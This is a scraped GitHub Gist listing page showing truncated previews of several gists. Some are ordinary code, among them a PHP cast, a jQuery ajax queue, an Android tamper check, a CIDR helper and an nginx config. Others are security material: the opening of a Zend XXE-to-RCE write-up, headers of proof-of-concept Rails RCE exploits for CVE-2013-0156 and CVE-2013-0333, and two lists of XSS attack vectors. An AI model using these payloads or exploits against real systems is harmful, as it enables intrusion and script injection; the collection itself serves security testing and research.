arthusu
victorbstan
/ php_object_to_array.php
Created
December 17, 2010 04:18
recursively cast a PHP object to array
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| This function saved my life. | |
| found on: http://www.sitepoint.com/forums//showthread.php?t=438748 | |
| by: crvandyke | |
| It takes an object, and when all else if/else/recursive functions fail to convert the object into an associative array, this one goes for the kill. Who would'a thunk it?! | |
| */ | |
| $array = json_decode(json_encode($object), true); |
gnarf
/ jQuery.ajaxQueue.min.js
Created
June 21, 2011 23:52
jQuery.ajaxQueue - A queue for ajax requests
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * jQuery.ajaxQueue - A queue for ajax requests | |
| * | |
| * (c) 2011 Corey Frang | |
| * Dual licensed under the MIT and GPL licenses. | |
| * | |
| * Requires jQuery 1.5+ | |
| */ | |
| (function(a){var b=a({});a.ajaxQueue=function(c){function g(b){d=a.ajax(c).done(e.resolve).fail(e.reject).then(b,b)}var d,e=a.Deferred(),f=e.promise();b.queue(g),f.abort=function(h){if(d)return d.abort(h);var i=b.queue(),j=a.inArray(g,i);j>-1&&i.splice(j,1),e.rejectWith(c.context||c,[f,h,""]);return f};return f}})(jQuery) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt | |
| into a Remote Command Execution: | |
| NOTE: It relies on the PHP expect module being loaded | |
| (see http://de.php.net/manual/en/book.expect.php) | |
| joern@vbox-1:/tmp$ cat /var/www/server.php | |
| <? | |
| require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php"); | |
| Zend_Loader_Autoloader::getInstance(); |
postmodern
/ rails_rce.rb
Last active
July 17, 2023 11:54
Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # | |
| # Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156) | |
| # | |
| # ## Advisory | |
| # | |
| # https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion | |
| # | |
| # ## Caveats | |
| # |
postmodern
/ rails_omakase.rb
Last active
December 25, 2020 10:14
Proof-of-Concept exploit for the new Rails Remote Code Execution vulnerability (CVE-2013-0333)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # | |
| # Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0333) | |
| # | |
| # ## Advisory | |
| # | |
| # https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo | |
| # | |
| # ## Caveats | |
| # |
JohannesHoppe
/ 666_lines_of_XSS_vectors.html
Created
May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API
copied from http://pastebin.com/48WdZR6L
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
scottyab
/ SignatureCheck.java
Last active
July 20, 2024 02:41
Simple Android signature check. Please note: This was created in 2013, not actively maintained and may not be compatible with the latest Android versions. It's not particularly difficult for an attacker to decompile an .apk, find this tamper check, replace the APP_SIGNATURE with theirs and rebuild (or use method hooking to return true from `vali…
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import android.content.Context; | |
| import android.content.pm.PackageInfo; | |
| import android.content.pm.PackageManager; | |
| import android.content.pm.PackageManager.NameNotFoundException; | |
| import android.content.pm.Signature; | |
| public class TamperCheck { | |
| //we store the hash of the signture for a little more protection | |
| private static final String APP_SIGNATURE = "1038C0E34658923C4192E61B16846"; |
gerbenjacobs
/ getIPRangeByCIDR.php
Last active
December 4, 2018 06:15
Get the start and end IP from an IP Range by a CIDR (Classless Inter-Domain Routing) notation, complete or incomplete. As discussed here: https://blog.gerbenjacobs.nl/get-ip-range-by-cidr-notation.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| function getIPRangeByCIDR($cidr) { | |
| // Making sure IPs are valid | |
| $ipdata = explode('/', ltrim($cidr, '0')); | |
| $dotcount = substr_count($ipdata[0], '.'); | |
| if ($dotcount != 3) { | |
| $ipdata[0] .= str_repeat('.0', (3-$dotcount)); | |
| } | |
| $cidr_address = sprintf('%s/%s', $ipdata[0], $ipdata[1]); |
kleinmatic
/ nginx.conf
Last active
June 1, 2020 08:29
— forked from mtigas/nginx.conf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This configuration file is provided on an "as is" basis, | |
| # with no warranties or representations, and any use of it | |
| # is at the user's own risk. | |
| user www-data; | |
| worker_processes 4; | |
| pid /run/nginx.pid; | |
| events { | |
| worker_connections 768; |
soaj1664
/ xss attack vectors
Created
March 16, 2014 19:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <div style="color:rgb(''�x:expression(alert(1))"></div> | |
| <img/src=%00 id=confirm(1) onerror=eval(id) | |
| <div id=confirm(1) onmouseover=eval(id)>X</div> | |
| <span/onmouseover=confirm(1)>X</span> | |
| <svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(88)&chr(83)&chr(83))) |
OlderNewer